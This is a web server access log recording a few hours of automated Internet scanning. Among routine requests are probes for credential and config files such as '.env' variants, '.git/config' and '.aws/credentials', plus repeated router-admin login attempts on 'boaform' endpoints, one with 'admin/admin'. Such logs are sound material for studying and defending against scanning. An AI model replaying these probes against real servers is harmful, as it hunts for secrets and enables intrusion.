178.128.170.164 - - [04/May/2025:13:28:20 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "http://ns2.obaba.shop/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
104.234.115.113 - - [04/May/2025:13:29:28 +0530] "\x16\x03\x01" 400 226 "-" "-"
104.234.115.113 - - [04/May/2025:13:30:00 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
34.78.35.211 - - [04/May/2025:13:37:25 +0530] "GET / HTTP/1.1" 200 1620 "-" "python-requests/2.32.3"
154.81.156.34 - - [04/May/2025:13:43:11 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:13:43:53 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.149.188 - - [04/May/2025:13:46:52 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
65.49.1.49 - - [04/May/2025:13:53:35 +0530] "\x16\x03\x01" 400 226 "-" "-"
64.62.156.117 - - [04/May/2025:13:54:28 +0530] "\x16\x03\x01" 400 226 "-" "-"
212.107.12.18 - - [04/May/2025:13:57:28 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.54 - - [04/May/2025:13:58:42 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [04/May/2025:14:00:44 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.137.188 - - [04/May/2025:14:02:28 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:14:02:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:14:02:29 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.107.12.18 - - [04/May/2025:14:03:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.7 - - [04/May/2025:14:05:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
162.216.149.92 - - [04/May/2025:14:10:20 +0530] "GET / HTTP/1.1" 200 1620 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.81.156.34 - - [04/May/2025:14:11:06 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:14:11:35 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
162.243.19.73 - - [04/May/2025:14:13:48 +0530] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
162.243.19.73 - - [04/May/2025:14:13:49 +0530] "GET /.git/config HTTP/1.1" 404 209 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
87.251.78.46 - - [04/May/2025:14:20:03 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
87.251.78.46 - - [04/May/2025:14:20:05 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
176.65.137.188 - - [04/May/2025:14:21:28 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:14:21:29 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:14:21:29 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
154.81.156.35 - - [04/May/2025:14:27:56 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
14.35.50.101 - - [04/May/2025:14:28:18 +0530] "GET / HTTP/1.0" 200 4270 "-" "curl/7.88.1"
212.107.12.18 - - [04/May/2025:14:28:58 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:14:29:03 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.35 - - [04/May/2025:14:30:21 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [04/May/2025:14:30:44 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.52.24.188 - - [04/May/2025:14:34:16 +0530] "\x16\x03\x01\x02" 400 226 "-" "-"
164.52.24.188 - - [04/May/2025:14:34:17 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.24.188 - - [04/May/2025:14:34:20 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
164.52.24.188 - - [04/May/2025:14:34:23 +0530] "GET /v1/models HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.24.188 - - [04/May/2025:14:34:26 +0530] "GET /v1/models HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.24.188 - - [04/May/2025:14:34:30 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.24.188 - - [04/May/2025:14:34:33 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
185.218.86.4 - - [04/May/2025:14:34:55 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [04/May/2025:14:38:46 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.142.182 - - [04/May/2025:14:40:00 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.35 - - [04/May/2025:14:40:36 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.34 - - [04/May/2025:14:40:58 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.35 - - [04/May/2025:14:43:08 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.142.182 - - [04/May/2025:14:49:27 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.54 - - [04/May/2025:14:55:35 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.16 - - [04/May/2025:14:57:12 +0530] "\x16\x03\x01" 400 226 "-" "-"
147.185.132.16 - - [04/May/2025:14:57:13 +0530] "\x16\x03\x01" 400 226 "-" "-"
212.107.12.18 - - [04/May/2025:14:58:55 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:14:59:10 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
64.23.185.79 - - [04/May/2025:15:00:45 +0530] "GET /files/logo.png HTTP/1.0" 404 212 "-" "-"
154.81.156.34 - - [04/May/2025:15:07:03 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:15:08:43 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.142.182 - - [04/May/2025:15:09:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.218.84.178 - - [04/May/2025:15:20:13 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
164.52.24.188 - - [04/May/2025:15:20:55 +0530] "\x16\x03\x01\x02" 400 226 "-" "-"
164.52.24.188 - - [04/May/2025:15:20:56 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
185.218.84.178 - - [04/May/2025:15:25:00 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.107.12.18 - - [04/May/2025:15:26:06 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:15:28:24 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
71.6.165.200 - - [04/May/2025:15:29:44 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
71.6.165.200 - - [04/May/2025:15:29:44 +0530] "GET /robots.txt HTTP/1.1" 404 208 "-" "-"
71.6.165.200 - - [04/May/2025:15:29:45 +0530] "GET /sitemap.xml HTTP/1.1" 404 209 "-" "-"
71.6.165.200 - - [04/May/2025:15:29:46 +0530] "GET /.well-known/security.txt HTTP/1.1" 404 222 "-" "-"
71.6.165.200 - - [04/May/2025:15:29:50 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
154.81.156.34 - - [04/May/2025:15:36:11 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.142.182 - - [04/May/2025:15:36:17 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [04/May/2025:15:36:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.142.182 - - [04/May/2025:15:36:18 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
154.81.156.34 - - [04/May/2025:15:36:49 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
185.218.84.39 - - [04/May/2025:15:45:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0"
59.173.134.157 - - [04/May/2025:15:46:43 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
124.31.107.231 - - [04/May/2025:15:47:07 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
183.93.80.127 - - [04/May/2025:15:47:07 +0530] "GET /./favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
190.21.220.74 - - [04/May/2025:15:47:41 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello-World/1.0"
176.65.137.188 - - [04/May/2025:15:48:08 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:15:48:08 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:15:48:09 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:15:49:19 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:15:49:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:15:49:20 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
122.97.136.155 - - [04/May/2025:15:54:46 +0530] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 221 "-" "-"
212.107.12.18 - - [04/May/2025:15:56:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:15:56:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:15:56:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:15:56:55 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
212.107.12.18 - - [04/May/2025:16:00:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.34 - - [04/May/2025:16:03:33 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:16:05:56 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
175.6.217.4 - - [04/May/2025:16:13:06 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.35 - - [04/May/2025:16:22:44 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
204.76.203.35 - - [04/May/2025:16:24:48 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
212.107.12.18 - - [04/May/2025:16:25:53 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:16:27:29 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [04/May/2025:16:27:43 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.34 - - [04/May/2025:16:31:14 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:16:32:38 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.137.188 - - [04/May/2025:16:36:22 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:16:36:22 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:16:36:22 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
185.91.127.81 - - [04/May/2025:16:38:17 +0530] "CONNECT api.ip.pn:443 HTTP/1.1" 200 4270 "-" "Go-http-client/1.1"
185.91.127.81 - - [04/May/2025:16:38:17 +0530] "\x16\x03\x01" 400 226 "-" "-"
220.120.93.98 - - [04/May/2025:16:43:39 +0530] "GET / HTTP/1.0" 200 4270 "-" "curl/7.88.1"
185.91.127.81 - - [04/May/2025:16:47:45 +0530] "CONNECT api.ip.pn:443 HTTP/1.1" 200 4270 "-" "Go-http-client/1.1"
185.91.127.81 - - [04/May/2025:16:47:46 +0530] "\x16\x03\x01" 400 226 "-" "-"
154.81.156.35 - - [04/May/2025:16:50:05 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.35 - - [04/May/2025:16:50:54 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
94.26.90.247 - - [04/May/2025:16:51:25 +0530] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
154.81.156.34 - - [04/May/2025:17:00:26 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.34 - - [04/May/2025:17:01:21 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
80.82.77.202 - - [04/May/2025:17:04:06 +0530] "GET / HTTP/1.0" 200 4270 "-" "Wget/1.12 (freebsd8.1)"
212.107.12.18 - - [04/May/2025:17:06:11 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:17:07:22 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [04/May/2025:17:12:54 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.218.86.4 - - [04/May/2025:17:17:45 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.153.35.128 - - [04/May/2025:17:19:05 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
170.106.160.90 - - [04/May/2025:17:20:11 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.235.24.42 - - [04/May/2025:17:24:04 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
162.243.68.161 - - [04/May/2025:17:25:17 +0530] "\x16\x03\x01" 400 226 "-" "-"
162.243.68.161 - - [04/May/2025:17:25:18 +0530] "\x16\x03\x01" 400 226 "-" "-"
162.243.68.161 - - [04/May/2025:17:25:18 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.68.161 - - [04/May/2025:17:25:19 +0530] "GET /form.html HTTP/1.1" 404 207 "-" "curl/8.1.2"
162.243.68.161 - - [04/May/2025:17:25:19 +0530] "GET /upl.php HTTP/1.1" 404 205 "-" "Mozilla/5.0"
162.243.68.161 - - [04/May/2025:17:25:20 +0530] "GET /t4 HTTP/1.1" 404 200 "-" "Mozilla/5.0"
162.243.68.161 - - [04/May/2025:17:25:20 +0530] "GET /geoip/ HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.68.161 - - [04/May/2025:17:25:20 +0530] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.68.161 - - [04/May/2025:17:25:21 +0530] "GET /1.php HTTP/1.1" 404 203 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.68.161 - - [04/May/2025:17:25:21 +0530] "GET /systembc/password.php HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.68.161 - - [04/May/2025:17:25:22 +0530] "GET /password.php HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
23.234.112.121 - - [04/May/2025:17:27:55 +0530] "GET / HTTP/1.1" 200 1620 "-" "WanScannerBot/1.0"
154.81.156.34 - - [04/May/2025:17:27:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
23.234.112.121 - - [04/May/2025:17:28:04 +0530] "\x16\x03\x01" 400 226 "-" "-"
154.81.156.34 - - [04/May/2025:17:28:49 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
176.65.142.182 - - [04/May/2025:17:29:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
212.107.12.18 - - [04/May/2025:17:30:44 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:17:30:53 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:17:30:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:17:30:54 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:17:31:12 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [04/May/2025:17:31:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [04/May/2025:17:31:13 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
206.81.12.187 - - [04/May/2025:17:31:20 +0530] "\x16\x03\x01\x01\x04\x01" 400 226 "-" "-"
206.81.12.187 - - [04/May/2025:17:31:20 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
206.81.12.187 - - [04/May/2025:17:31:20 +0530] "GET / HTTP/1.1" 200 4270 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA572694) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1737.98 Mobile Safari/537.3"
206.81.12.187 - - [04/May/2025:17:31:21 +0530] "GET /@vite/env HTTP/1.1" 404 207 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:21 +0530] "GET /actuator/env HTTP/1.1" 404 210 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:22 +0530] "GET /server HTTP/1.1" 404 204 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:22 +0530] "GET /.vscode/sftp.json HTTP/1.1" 404 215 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:22 +0530] "GET /about HTTP/1.1" 404 203 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:23 +0530] "GET /debug/default/view?panel=config HTTP/1.1" 404 216 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:23 +0530] "GET /v2/_catalog HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:24 +0530] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 273 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:24 +0530] "GET /server-status HTTP/1.1" 200 2542 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:25 +0530] "GET /login.action HTTP/1.1" 404 210 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:25 +0530] "GET /_all_dbs HTTP/1.1" 404 206 "-" "Mozilla/5.0 (l9scan/2.0.633323e21353e2534313e2330313; +https://leakix.net)"
206.81.12.187 - - [04/May/2025:17:31:25 +0530] "GET /.DS_Store HTTP/1.1" 404 207 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:26 +0530] "GET /.env HTTP/1.1" 404 202 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:26 +0530] "GET /.git/config HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:27 +0530] "GET /s/633323e21353e2534313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:27 +0530] "GET /config.json HTTP/1.1" 404 209 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:27 +0530] "GET /telescope/requests HTTP/1.1" 404 216 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:28 +0530] "GET /info.php HTTP/1.1" 404 206 "-" "Go-http-client/1.1"
206.81.12.187 - - [04/May/2025:17:31:28 +0530] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1620 "-" "Go-http-client/1.1"
80.82.77.202 - - [04/May/2025:17:32:07 +0530] "GET / HTTP/1.0" 200 4270 "-" "Wget/1.12 (freebsd8.1)"
49.51.33.159 - - [04/May/2025:17:32:26 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.107.12.18 - - [04/May/2025:17:32:53 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
154.81.156.7 - - [04/May/2025:17:33:55 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.218.86.4 - - [04/May/2025:17:38:29 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.42 - - [04/May/2025:17:39:58 +0530] "\x16\x03\x01" 400 226 "-" "-"
45.148.10.42 - - [04/May/2025:17:39:59 +0530] "GET / HTTP/1.1" 400 226 "-" "-"
45.148.10.42 - - [04/May/2025:17:39:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "l9tcpid/v1.1.0"
45.148.10.42 - - [04/May/2025:17:39:59 +0530] "GET /media../.git/config HTTP/1.1" 404 217 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:39:59 +0530] "GET /docker-compose.prod.yml HTTP/1.1" 404 221 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:00 +0530] "GET /.env.dev.local HTTP/1.1" 404 212 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:00 +0530] "GET /media/.git/config HTTP/1.1" 404 215 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:00 +0530] "GET /www/.git/config HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:00 +0530] "GET /.env.live HTTP/1.1" 404 207 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:01 +0530] "GET /.env.stage HTTP/1.1" 404 208 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:01 +0530] "GET /config/.env HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:01 +0530] "GET /.aws/credentials HTTP/1.1" 404 214 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:01 +0530] "GET /config.json HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:02 +0530] "GET /.env.test HTTP/1.1" 404 207 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:02 +0530] "GET /.git/config HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:02 +0530] "GET /.env.production.local HTTP/1.1" 404 219 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:02 +0530] "GET /.env_sample HTTP/1.1" 404 209 "-" "l9explore/1.2.2"
45.148.10.42 - - [04/May/2025:17:40:03 +0530] "GET /src/.git/config HTTP/1.1" 404 213 "-" "l9explore/1.2.2"
